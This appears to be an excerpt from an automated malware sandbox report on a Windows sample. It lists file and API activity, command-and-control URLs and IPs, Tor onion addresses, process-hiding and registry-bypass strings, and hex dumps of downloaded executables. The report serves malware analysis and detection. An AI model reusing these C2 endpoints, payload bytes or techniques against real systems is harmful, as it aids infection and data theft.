Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Code function: 22_2_004065CA FindFirstFileA,FindClose,	22_2_004065CA
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Code function: 22_2_004059F9 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	22_2_004059F9
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Code function: 22_2_004027AF FindFirstFileA,	22_2_004027AF
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00474060 FindFirstFileA,FindNextFileA,FindClose,	24_2_00474060
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_004520C0 FindFirstFileA,GetLastError,	24_2_004520C0
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_004966E4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,	24_2_004966E4
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_004634F4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	24_2_004634F4
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00463970 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	24_2_00463970
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00461F68 FindFirstFileA,FindNextFileA,FindClose,	24_2_00461F68

Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 52.217.163.105 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.215.113.68 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 5.42.65.125 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.192.141.1 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 158.160.130.138 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://5.42.66.58/3886d2276f6914c4.php
Source: Malware configuration extractor	URLs: http://185.215.113.68/fks/index.php
Source: Malware configuration extractor	URLs: http://185.215.113.68/fks/index.php
Source: Malware configuration extractor	URLs: 195.20.16.103:18305

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 5.42.65.31 ports 3,4,6,8,9,48396
Source: global traffic	TCP traffic: 195.20.16.103 ports 0,1,3,5,8,18305

Found Tor onion address

Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: s25519: internal error: setShortBytes called with a long stringhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls: handshake message of length %d bytes exceeds maximum o
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: nvalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackint
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.00000000036C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2521102635.000000000C12A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://statscreate.orghttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onion
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2521102635.000000000C0A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onion
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2521102635.000000000C0A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: =$T%SE'@2=(31230d161c143d24542553452740323d28http://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionhttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionS-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\TestAppS-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80SELECT Name FROM Win32_ProcessorIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzSELECT Name FROM Win32_VideoControllerS-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6SESSIONNAME=ConsoleUSERDOMAIN=user-PCwindir=C:\WindowsPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntel
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2521102635.000000000C106000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: S-1-5-21-2246122658-3693405117-2476756634-1002https://statscreate.orghttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionSoftware\Classes\ms-settings\shell\open\commandSoftware\Classes\ms-settings\shell\open\commandCommonProgramW6432=C:\Program Files\Common FilesFPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2521102635.000000000C0D6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onion
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2521102635.000000000C0D6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SELECT Caption FROM Win32_OperatingSystemMicrosoft Windows 10 ProHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\TestAppHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1002\Software\Microsoft\ec18cc80https://statscreate.orghttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionhttps://statscreate.orghttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionSELECT Caption FROM Win32_OperatingSystemMicrosoft Windows 10 ProCOMPUTERNAME=user-PCHOMEPATH=\Users\userLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2PROCESSOR_REVISION=8f08PUBLIC=C:\Users\PublicSystemRoot=C:\Windows

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1

Yara detected Generic Downloader

Source: Yara match	File source: 6.0.907.exe.c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\907.exe, type: DROPPED

Source: global traffic	TCP traffic: 192.168.2.4:49739 -> 195.20.16.103:18305
Source: global traffic	TCP traffic: 192.168.2.4:49778 -> 5.42.65.31:48396
Source: global traffic	TCP traffic: 192.168.2.4:49783 -> 185.196.9.220:7702
Source: global traffic	TCP traffic: 192.168.2.4:49789 -> 91.92.250.73:8524
Source: global traffic	TCP traffic: 192.168.2.4:49790 -> 45.42.45.36:45450
Source: global traffic	UDP traffic: 192.168.2.4:55464 -> 38.6.193.13:8889

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:23 GMTContent-Type: application/octet-streamContent-Length: 19755520Last-Modified: Sun, 24 Dec 2023 05:03:49 GMTConnection: keep-aliveETag: "6587bbb5-12d7200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b5 bb 87 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 68 2d 01 00 08 00 00 00 00 00 00 2e 86 2d 01 00 20 00 00 00 a0 2d 01 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 2d 01 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 85 2d 01 53 00 00 00 00 a0 2d 01 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2d 01 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 66 2d 01 00 20 00 00 00 68 2d 01 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 04 00 00 00 a0 2d 01 00 06 00 00 00 6a 2d 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 2d 01 00 02 00 00 00 70 2d 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 86 2d 01 00 00 00 00 48 00 00 00 02 00 05 00 24 70 2d 01 b4 15 00 00 03 00 00 00 01 00 00 06 30 28 00 00 f2 47 2d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Dec 2023 16:57:39 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 27 Dec 2023 16:45:01 GMTETag: "2ce00-60d80852aa67c"Accept-Ranges: bytesContent-Length: 183808Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c4 6c 00 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 2a 02 00 00 d2 42 00 00 00 00 00 a9 3c 00 00 00 10 00 00 00 40 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 44 00 00 04 00 00 69 05 03 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 6b 02 00 64 00 00 00 00 90 44 00 40 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 41 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 5e 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c2 28 02 00 00 10 00 00 00 2a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 34 00 00 00 40 02 00 00 36 00 00 00 2e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 06 42 00 00 80 02 00 00 18 00 00 00 64 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 51 00 00 00 90 44 00 00 52 00 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:56 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 